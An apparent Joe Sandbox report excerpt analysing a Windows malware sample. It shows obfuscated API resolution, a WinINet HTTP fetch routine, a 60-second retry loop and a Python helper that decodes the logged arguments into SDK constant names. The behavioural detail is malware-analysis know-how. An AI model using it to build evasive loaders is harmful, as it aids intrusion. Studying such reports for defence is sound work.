                                        • Instruction Fuzzy Hash: B8D05E7490030CDBDB00DFE0D8497DDBB78FB0C311F000659D90562340EA305481CBAA

                                        Control-flow Graph

                                        APIs
                                        • GetProcAddress.KERNEL32(75900000,015F67C0), ref: 00A59C2D
                                        • GetProcAddress.KERNEL32(75900000,015F6860), ref: 00A59C45
                                        • GetProcAddress.KERNEL32(75900000,016096C0), ref: 00A59C5E
                                        • GetProcAddress.KERNEL32(75900000,01609600), ref: 00A59C76
                                        • GetProcAddress.KERNEL32(75900000,0160D200), ref: 00A59C8E
                                        • GetProcAddress.KERNEL32(75900000,0160D1A0), ref: 00A59CA7
                                        • GetProcAddress.KERNEL32(75900000,015FBDE8), ref: 00A59CBF
                                        • GetProcAddress.KERNEL32(75900000,0160CF48), ref: 00A59CD7
                                        • GetProcAddress.KERNEL32(75900000,0160D1B8), ref: 00A59CF0
                                        • GetProcAddress.KERNEL32(75900000,0160D188), ref: 00A59D08
                                        • GetProcAddress.KERNEL32(75900000,0160D098), ref: 00A59D20
                                        • GetProcAddress.KERNEL32(75900000,015F69A0), ref: 00A59D39
                                        • GetProcAddress.KERNEL32(75900000,015F66A0), ref: 00A59D51
                                        • GetProcAddress.KERNEL32(75900000,015F69C0), ref: 00A59D69
                                        • GetProcAddress.KERNEL32(75900000,015F6880), ref: 00A59D82
                                        • GetProcAddress.KERNEL32(75900000,0160D1D0), ref: 00A59D9A
                                        • GetProcAddress.KERNEL32(75900000,0160CF90), ref: 00A59DB2
                                        • GetProcAddress.KERNEL32(75900000,015FBB90), ref: 00A59DCB
                                        • GetProcAddress.KERNEL32(75900000,015F66E0), ref: 00A59DE3
                                        • GetProcAddress.KERNEL32(75900000,0160D1E8), ref: 00A59DFB
                                        • GetProcAddress.KERNEL32(75900000,0160D038), ref: 00A59E14
                                        • GetProcAddress.KERNEL32(75900000,0160D140), ref: 00A59E2C
                                        • GetProcAddress.KERNEL32(75900000,0160D0B0), ref: 00A59E44
                                        • GetProcAddress.KERNEL32(75900000,015F68A0), ref: 00A59E5D
                                        • GetProcAddress.KERNEL32(75900000,0160CFC0), ref: 00A59E75
                                        • GetProcAddress.KERNEL32(75900000,0160CFA8), ref: 00A59E8D
                                        • GetProcAddress.KERNEL32(75900000,0160D0C8), ref: 00A59EA6
                                        • GetProcAddress.KERNEL32(75900000,0160D158), ref: 00A59EBE
                                        • GetProcAddress.KERNEL32(75900000,0160D0E0), ref: 00A59ED6
                                        • GetProcAddress.KERNEL32(75900000,0160D0F8), ref: 00A59EEF
                                        • GetProcAddress.KERNEL32(75900000,0160CF18), ref: 00A59F07
                                        • GetProcAddress.KERNEL32(75900000,0160CF30), ref: 00A59F1F
                                        • GetProcAddress.KERNEL32(75900000,0160D110), ref: 00A59F38
                                        • GetProcAddress.KERNEL32(75900000,0160A9F8), ref: 00A59F50
                                        • GetProcAddress.KERNEL32(75900000,0160CFD8), ref: 00A59F68
                                        • GetProcAddress.KERNEL32(75900000,0160CFF0), ref: 00A59F81
                                        • GetProcAddress.KERNEL32(75900000,015F6960), ref: 00A59F99
                                        • GetProcAddress.KERNEL32(75900000,0160CF60), ref: 00A59FB1
                                        • GetProcAddress.KERNEL32(75900000,015F6980), ref: 00A59FCA
                                        • GetProcAddress.KERNEL32(75900000,0160D020), ref: 00A59FE2
                                        • GetProcAddress.KERNEL32(75900000,0160D128), ref: 00A59FFA
                                        • GetProcAddress.KERNEL32(75900000,015F6460), ref: 00A5A013
                                        • GetProcAddress.KERNEL32(75900000,015F6280), ref: 00A5A02B
                                        • LoadLibraryA.KERNEL32(0160D170,?,00A55CA3,00A60AEB,?,?,?,?,?,?,?,?,?,?,00A60AEA,00A60AE3), ref: 00A5A03D
                                        • LoadLibraryA.KERNEL32(0160D008,?,00A55CA3,00A60AEB,?,?,?,?,?,?,?,?,?,?,00A60AEA,00A60AE3), ref: 00A5A04E
                                        • LoadLibraryA.KERNEL32(0160CF78,?,00A55CA3,00A60AEB,?,?,?,?,?,?,?,?,?,?,00A60AEA,00A60AE3), ref: 00A5A060
                                        • LoadLibraryA.KERNEL32(0160D050,?,00A55CA3,00A60AEB,?,?,?,?,?,?,?,?,?,?,00A60AEA,00A60AE3), ref: 00A5A072
                                        • LoadLibraryA.KERNEL32(0160D068,?,00A55CA3,00A60AEB,?,?,?,?,?,?,?,?,?,?,00A60AEA,00A60AE3), ref: 00A5A083
                                        • LoadLibraryA.KERNEL32(0160D080,?,00A55CA3,00A60AEB,?,?,?,?,?,?,?,?,?,?,00A60AEA,00A60AE3), ref: 00A5A095
                                        • LoadLibraryA.KERNEL32(0160D2C0,?,00A55CA3,00A60AEB,?,?,?,?,?,?,?,?,?,?,00A60AEA,00A60AE3), ref: 00A5A0A7
                                        • LoadLibraryA.KERNEL32(0160D2A8,?,00A55CA3,00A60AEB,?,?,?,?,?,?,?,?,?,?,00A60AEA,00A60AE3), ref: 00A5A0B8
                                        • GetProcAddress.KERNEL32(75FD0000,015F6440), ref: 00A5A0DA
                                        • GetProcAddress.KERNEL32(75FD0000,0160D3E0), ref: 00A5A0F2
                                        • GetProcAddress.KERNEL32(75FD0000,01608F58), ref: 00A5A10A
                                        • GetProcAddress.KERNEL32(75FD0000,0160D230), ref: 00A5A123
                                        • GetProcAddress.KERNEL32(75FD0000,015F6380), ref: 00A5A13B
                                        • GetProcAddress.KERNEL32(734B0000,015FB6B8), ref: 00A5A160
                                        • GetProcAddress.KERNEL32(734B0000,015F64C0), ref: 00A5A179
                                        • GetProcAddress.KERNEL32(734B0000,015FBA00), ref: 00A5A191
                                        • GetProcAddress.KERNEL32(734B0000,0160D248), ref: 00A5A1A9
                                        • GetProcAddress.KERNEL32(734B0000,0160D308), ref: 00A5A1C2
                                        • GetProcAddress.KERNEL32(734B0000,015F6320), ref: 00A5A1DA
                                        • GetProcAddress.KERNEL32(734B0000,015F62C0), ref: 00A5A1F2
                                        • GetProcAddress.KERNEL32(734B0000,0160D2D8), ref: 00A5A20B
                                        • GetProcAddress.KERNEL32(763B0000,015F6540), ref: 00A5A22C
                                        • GetProcAddress.KERNEL32(763B0000,015F64E0), ref: 00A5A244
                                        • GetProcAddress.KERNEL32(763B0000,0160D4B8), ref: 00A5A25D
                                        • GetProcAddress.KERNEL32(763B0000,0160D2F0), ref: 00A5A275
                                        • GetProcAddress.KERNEL32(763B0000,015F62E0), ref: 00A5A28D
                                        • GetProcAddress.KERNEL32(750F0000,015FB9B0), ref: 00A5A2B3
                                        • GetProcAddress.KERNEL32(750F0000,015FB708), ref: 00A5A2CB
                                        • GetProcAddress.KERNEL32(750F0000,0160D488), ref: 00A5A2E3
                                        • GetProcAddress.KERNEL32(750F0000,015F64A0), ref: 00A5A2FC
                                        • GetProcAddress.KERNEL32(750F0000,015F65E0), ref: 00A5A314
                                        • GetProcAddress.KERNEL32(750F0000,015FB758), ref: 00A5A32C
                                        • GetProcAddress.KERNEL32(75A50000,0160D320), ref: 00A5A352
                                        • GetProcAddress.KERNEL32(75A50000,015F6340), ref: 00A5A36A
                                        • GetProcAddress.KERNEL32(75A50000,01608F28), ref: 00A5A382
                                        • GetProcAddress.KERNEL32(75A50000,0160D3F8), ref: 00A5A39B
                                        • GetProcAddress.KERNEL32(75A50000,0160D260), ref: 00A5A3B3
                                        • GetProcAddress.KERNEL32(75A50000,015F6600), ref: 00A5A3CB
                                        • GetProcAddress.KERNEL32(75A50000,015F6640), ref: 00A5A3E4
                                        • GetProcAddress.KERNEL32(75A50000,0160D4A0), ref: 00A5A3FC
                                        • GetProcAddress.KERNEL32(75A50000,0160D440), ref: 00A5A414
                                        • GetProcAddress.KERNEL32(75070000,015F6620), ref: 00A5A436
                                        • GetProcAddress.KERNEL32(75070000,0160D338), ref: 00A5A44E
                                        • GetProcAddress.KERNEL32(75070000,0160D278), ref: 00A5A466
                                        • GetProcAddress.KERNEL32(75070000,0160D4D0), ref: 00A5A47F
                                        • GetProcAddress.KERNEL32(75070000,0160D350), ref: 00A5A497
                                        • GetProcAddress.KERNEL32(74E50000,015F65C0), ref: 00A5A4B8
                                        • GetProcAddress.KERNEL32(74E50000,015F6580), ref: 00A5A4D1
                                        • GetProcAddress.KERNEL32(75320000,015F6660), ref: 00A5A4F2
                                        • GetProcAddress.KERNEL32(75320000,0160D4E8), ref: 00A5A50A
                                        • GetProcAddress.KERNEL32(6F060000,015F6300), ref: 00A5A530
                                        • GetProcAddress.KERNEL32(6F060000,015F6360), ref: 00A5A548
                                        • GetProcAddress.KERNEL32(6F060000,015F6480), ref: 00A5A560
                                        • GetProcAddress.KERNEL32(6F060000,0160D368), ref: 00A5A579
                                        • GetProcAddress.KERNEL32(6F060000,015F63A0), ref: 00A5A591
                                        • GetProcAddress.KERNEL32(6F060000,015F6500), ref: 00A5A5A9
                                        • GetProcAddress.KERNEL32(6F060000,015F62A0), ref: 00A5A5C2
                                        • GetProcAddress.KERNEL32(6F060000,015F63C0), ref: 00A5A5DA
                                        • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00A5A5F1
                                        • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00A5A607
                                        • GetProcAddress.KERNEL32(74E00000,0160D500), ref: 00A5A629
                                        • GetProcAddress.KERNEL32(74E00000,01608FA8), ref: 00A5A641
                                        • GetProcAddress.KERNEL32(74E00000,0160D218), ref: 00A5A659
                                        • GetProcAddress.KERNEL32(74E00000,0160D410), ref: 00A5A672
                                        • GetProcAddress.KERNEL32(74DF0000,015F6520), ref: 00A5A693
                                        • GetProcAddress.KERNEL32(6E570000,0160D3C8), ref: 00A5A6B4
                                        • GetProcAddress.KERNEL32(6E570000,015F6560), ref: 00A5A6CD
                                        • GetProcAddress.KERNEL32(6E570000,0160D380), ref: 00A5A6E5
                                        • GetProcAddress.KERNEL32(6E570000,0160D290), ref: 00A5A6FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: HttpQueryInfoA$InternetSetOptionA
                                        • API String ID: 2238633743-1775429166
                                        • Opcode ID: bc56ec5eeeaa024028a47dffea6c15eefec9af378a0cca43abb963f8bdbfe2c9
                                        • Instruction ID: 8730e8ea406bf6f037033e343c6e737b7bd3ac61dfca26bd78424d663a9f8bf7
                                        • Opcode Fuzzy Hash: bc56ec5eeeaa024028a47dffea6c15eefec9af378a0cca43abb963f8bdbfe2c9
                                        • Instruction Fuzzy Hash: 7C621BB5610200AFF744DFA8ED88B5E37F9F78C701714851BA609C3274D739A852EB6A

                                         Control-flow Graph

                                         Basic blocks of the function at 00A46280, recovered from the graph dump (start-end: API calls and subcalls made in the block -> successor blocks; the executed/not-executed colouring of the rendered graph is not recoverable from the text):
                                         • a46280-a4630b: call a5a7a0, call a447b0, call a5a740, InternetOpenA, StrCmpCA -> a46314, a4630d
                                         • a4630d -> a46314
                                         • a46314-a46318 -> a4631e, a46509
                                         • a4631e-a46342: InternetConnectA -> a464ff, a46348
                                         • a46348-a4634c -> a4634e, a4635a
                                         • a4634e-a46358 -> a46364
                                         • a4635a -> a46364
                                         • a46364-a46392: HttpOpenRequestA -> a464f5, a46398
                                         • a46398-a4639c -> a463c5, a4639e
                                         • a4639e-a463bf: InternetSetOptionA -> a463c5
                                         • a463c5-a46405: HttpSendRequestA, HttpQueryInfoA -> a46407, a4642c
                                         • a46407-a46427: call a5a740, call a5a800 (x2) -> a46528
                                         • a4642c-a4644b: call a58940 -> a4644d, a464c9
                                         • a4644d-a46454 -> a46456, a464c7
                                         • a46456-a46480: InternetReadFile -> a46482, a4648b
                                         • a46482-a46489 -> a4648b, a4648d
                                         • a4648b -> a464c7
                                         • a4648d-a464c5: call a5a9b0, call a5a8a0, call a5a800 -> a46456
                                         • a464c7-a464ef: InternetCloseHandle -> a464f5
                                         • a464c9-a464e9: call a5a740, call a5a800 (x2) -> a46528
                                         • a464f5-a464f9: InternetCloseHandle -> a464ff
                                         • a464ff-a46503: InternetCloseHandle -> a46509
                                         • a46509-a46525: call a5a7a0, call a5a800 (x2) -> a46528
                                         • a46528-a4652d (no successors)
                                        APIs
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                          • Part of subcall function 00A447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A44839
                                          • Part of subcall function 00A447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A44849
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        • InternetOpenA.WININET(00A60DFE,00000001,00000000,00000000,00000000), ref: 00A462E1
                                        • StrCmpCA.SHLWAPI(?,0160E9B0), ref: 00A46303
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A46335
                                        • HttpOpenRequestA.WININET(00000000,GET,?,0160E578,00000000,00000000,00400100,00000000), ref: 00A46385
                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A463BF
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A463D1
                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00A463FD
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00A4646D
                                        • InternetCloseHandle.WININET(00000000), ref: 00A464EF
                                        • InternetCloseHandle.WININET(00000000), ref: 00A464F9
                                        • InternetCloseHandle.WININET(00000000), ref: 00A46503
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                        • String ID: ERROR$ERROR$GET
                                        • API String ID: 3749127164-2509457195
                                        • Opcode ID: 47dae3a8998cb30f52664f75173e23284c733eb3886b119bbaf0d78532229872
                                        • Instruction ID: 954440243653cbc4111a06842feab4e770ec6a95267ed75bd36712ef76b1a65e
                                        • Opcode Fuzzy Hash: 47dae3a8998cb30f52664f75173e23284c733eb3886b119bbaf0d78532229872
                                        • Instruction Fuzzy Hash: 98714E75A00218EBEF24DFA0CD49BEE7774BB45701F108199F509AB1D0DBB46A89CF52

                                         Control-flow Graph

                                         Basic blocks of the function at 00A55510, recovered from the graph dump (start-end: API calls and subcalls made in the block -> successor blocks; the executed/not-executed colouring of the rendered graph is not recoverable from the text):
                                         • a55510-a55577: call a55ad0, call a5a820 (x3), call a5a740 (x4) -> a5557c
                                         • a5557c-a55583 -> a55585, a555d7
                                         • a55585-a555b6: call a5a820, call a5a7a0, call a41590, call a551f0 -> a555bb
                                         • a555bb-a555d2: call a5a8a0, call a5a800 -> a55693
                                         • a555d7-a5564c: call a5a740 (x2), call a41590, call a552c0, call a5a8a0, call a5a800, call a5aad0, StrCmpCA -> a55693, a5564e
                                         • a5564e-a5568e: call a5a7a0, call a41590, call a551f0, call a5a8a0, call a5a800 -> a55693
                                         • a55693-a556a9: call a5aad0, StrCmpCA -> a557dc, a556af
                                         • a556af-a556b6 -> a556bc, a557da
                                         • a556bc-a556c3 -> a556c5, a5571e
                                         • a556c5-a55719: call a5a820, call a5a7a0, call a41590, call a551f0, call a5a8a0, call a5a800 -> a557da
                                         • a5571e-a55793: call a5a740 (x2), call a41590, call a552c0, call a5a8a0, call a5a800, call a5aad0, StrCmpCA -> a557da, a55795
                                         • a55795-a557d5: call a5a7a0, call a41590, call a551f0, call a5a8a0, call a5a800 -> a557da
                                         • a557da-a5585f: call a5aad0, StrCmpCA -> a55865, a55991
                                         • a557dc-a55844: call a5a8a0, call a5a820 (x2), call a41670, call a5a800 (x4), call a56560, call a41550 -> a55ac3
                                         • a55865-a5586c -> a55872, a5598f
                                         • a55872-a55879 -> a558d3, a5587b
                                         • a5587b-a558ce: call a5a820, call a5a7a0, call a41590, call a551f0, call a5a8a0, call a5a800 -> a5598f
                                         • a558d3-a55948: call a5a740 (x2), call a41590, call a552c0, call a5a8a0, call a5a800, call a5aad0, StrCmpCA -> a5598f, a5594a
                                         • a5594a-a5598a: call a5a7a0, call a41590, call a551f0, call a5a8a0, call a5a800 -> a5598f
                                         • a5598f-a55a14: call a5aad0, StrCmpCA -> a55a16, a55a28
                                         • a55991-a559f9: call a5a8a0, call a5a820 (x2), call a41670, call a5a800 (x4), call a56560, call a41550 -> a55ac3
                                         • a55a16-a55a21: Sleep -> a5557c
                                         • a55a28-a55a91: call a5a8a0, call a5a820 (x2), call a41670, call a5a800 (x4), call a56560, call a41550 -> a55ac3
                                         • a55ac3-a55ac6 (no successors)
                                        APIs
                                          • Part of subcall function 00A5A820: lstrlen.KERNEL32(00A44F05,?,?,00A44F05,00A60DDE), ref: 00A5A82B
                                          • Part of subcall function 00A5A820: lstrcpy.KERNEL32(00A60DDE,00000000), ref: 00A5A885
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A55644
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A556A1
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A55857
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                          • Part of subcall function 00A551F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A55228
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                          • Part of subcall function 00A552C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A55318
                                          • Part of subcall function 00A552C0: lstrlen.KERNEL32(00000000), ref: 00A5532F
                                          • Part of subcall function 00A552C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00A55364
                                          • Part of subcall function 00A552C0: lstrlen.KERNEL32(00000000), ref: 00A55383
                                          • Part of subcall function 00A552C0: lstrlen.KERNEL32(00000000), ref: 00A553AE
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A5578B
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A55940
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A55A0C
                                        • Sleep.KERNEL32(0000EA60), ref: 00A55A1B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen$Sleep
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 507064821-2791005934
                                        • Opcode ID: b3c05009e26d6561a511183647fcabea119ddd9560e1e27072448a35209be49a
                                        • Instruction ID: 07de5aa348d03e6cfd2b9801bbe63f9c810c257438ad044acfd6d1317915f86a
                                        • Opcode Fuzzy Hash: b3c05009e26d6561a511183647fcabea119ddd9560e1e27072448a35209be49a
                                        • Instruction Fuzzy Hash: B6E15271E10104AADB14FBB0DE56EED7738BF64341F508629B90766091EF346B4DCBA2
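The two records above, the HTTP fetch routine at 00A46280 and the retry loop at 00A55510, print their DWORD arguments as raw hex (00400100, 0000001F, 00000013, 000007CF, 0000EA60). The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses API lines in the report's `Name.DLL(args), ref: addr` format and replaces the positional arguments with the Windows SDK constant names they denote. The input lines are copied from the two records; the constant values are the documented ones from wininet.h, and the argument positions follow each API's prototype. Run over those lines it reads the HttpOpenRequestA flags as INTERNET_FLAG_KEEP_CONNECTION|INTERNET_FLAG_PRAGMA_NOCACHE, the InternetSetOptionA option as INTERNET_OPTION_SECURITY_FLAGS, the HttpQueryInfoA level as HTTP_QUERY_STATUS_CODE, the InternetReadFile chunk as 1999 bytes and the Sleep as 60000 ms, the block that loops back to a5557c in the graph above.

```python
"""Decode the raw DWORD arguments in Joe Sandbox 'APIs' lines.

Added example; not part of the Joe Sandbox report or of the sample. REPORT_LINES
are copied from the 00A46280 and 00A55510 records; constant values are from the
Windows SDK (wininet.h), argument positions from each API's documented prototype.
"""
import re

REPORT_LINES = [
    "InternetOpenA.WININET(00A60DFE,00000001,00000000,00000000,00000000), ref: 00A462E1",
    "InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A46335",
    "HttpOpenRequestA.WININET(00000000,GET,?,0160E578,00000000,00000000,00400100,00000000), ref: 00A46385",
    "InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A463BF",
    "HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00A463FD",
    "InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00A4646D",
    "Sleep.KERNEL32(0000EA60), ref: 00A55A1B",
]

# Name.DLL(arg,arg,...), ref: ADDR  (the argument list is absent for some calls)
LINE_RE = re.compile(r"^(?P<api>\w+)\.(?P<dll>\w+)(?:\((?P<args>[^)]*)\),)? ref: (?P<ref>[0-9A-Fa-f]{8})$")

INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}
INTERNET_OPTION = {2: "INTERNET_OPTION_CONNECT_TIMEOUT", 5: "INTERNET_OPTION_SEND_TIMEOUT",
                   6: "INTERNET_OPTION_RECEIVE_TIMEOUT", 31: "INTERNET_OPTION_SECURITY_FLAGS"}
HTTP_QUERY = {5: "HTTP_QUERY_CONTENT_LENGTH", 19: "HTTP_QUERY_STATUS_CODE",
              20: "HTTP_QUERY_STATUS_TEXT", 22: "HTTP_QUERY_RAW_HEADERS_CRLF"}
INTERNET_FLAGS = {  # bit flags accepted by HttpOpenRequestA dwFlags
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}


def decode_flags(value, table):
    """Split a bit-flag DWORD into known names; leftover bits stay as hex."""
    names, rest = [], value
    for bit, name in sorted(table.items(), reverse=True):
        if value & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:08X}")
    return "|".join(names) if names else "0"


def _enum(table):
    return lambda v: table.get(v, f"unknown ({v})")


# (API, zero-based argument index) -> (parameter name, decoder)
ARG_DECODERS = {
    ("InternetOpenA", 1): ("dwAccessType", _enum(INTERNET_OPEN_TYPE)),
    ("InternetConnectA", 5): ("dwService", _enum(INTERNET_SERVICE)),
    ("HttpOpenRequestA", 6): ("dwFlags", lambda v: decode_flags(v, INTERNET_FLAGS)),
    ("InternetSetOptionA", 1): ("dwOption", _enum(INTERNET_OPTION)),
    ("HttpQueryInfoA", 1): ("dwInfoLevel", _enum(HTTP_QUERY)),
    ("InternetReadFile", 2): ("dwNumberOfBytesToRead", lambda v: f"{v} bytes"),
    ("Sleep", 0): ("dwMilliseconds", lambda v: f"{v} ms ({v / 1000:g} s)"),
}


def parse_api_line(line):
    m = LINE_RE.match(line.strip().lstrip("• "))
    if m is None:
        raise ValueError(f"not a Joe Sandbox API line: {line!r}")
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    return {"api": m["api"], "dll": m["dll"], "args": args, "ref": m["ref"]}


def _as_int(token):
    # Numeric arguments are printed as 8 hex digits; '?' (unresolved by the
    # sandbox) and inline string literals such as GET are left as they are.
    return int(token, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", token) else None


def annotate(line):
    call = parse_api_line(line)
    decoded = {}
    for (api, pos), (name, decode) in ARG_DECODERS.items():
        if api == call["api"] and pos < len(call["args"]):
            value = _as_int(call["args"][pos])
            decoded[name] = decode(value) if value is not None else f"unresolved ({call['args'][pos]})"
    call["decoded"] = decoded
    return call


def annotate_report(lines):
    return [annotate(line) for line in lines]


if __name__ == "__main__":
    for call in annotate_report(REPORT_LINES):
        detail = ", ".join(f"{k}={v}" for k, v in call["decoded"].items())
        print(f"{call['ref']}  {call['api']:<20} {detail}")
```

Other APIs in the report can be covered by adding an `(API, index)` entry to `ARG_DECODERS`; anything the sandbox printed as `?` is reported as unresolved rather than guessed.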

                                         Control-flow Graph

                                         Basic blocks of the function at 00A517A0, recovered from the graph dump (start-end: API calls and subcalls made in the block -> successor blocks; the executed/not-executed colouring of the rendered graph is not recoverable from the text):
                                         • a517a0-a517cd: call a5aad0, StrCmpCA -> a517d7, a517cf
                                         • a517cf-a517d1: ExitProcess (no successors)
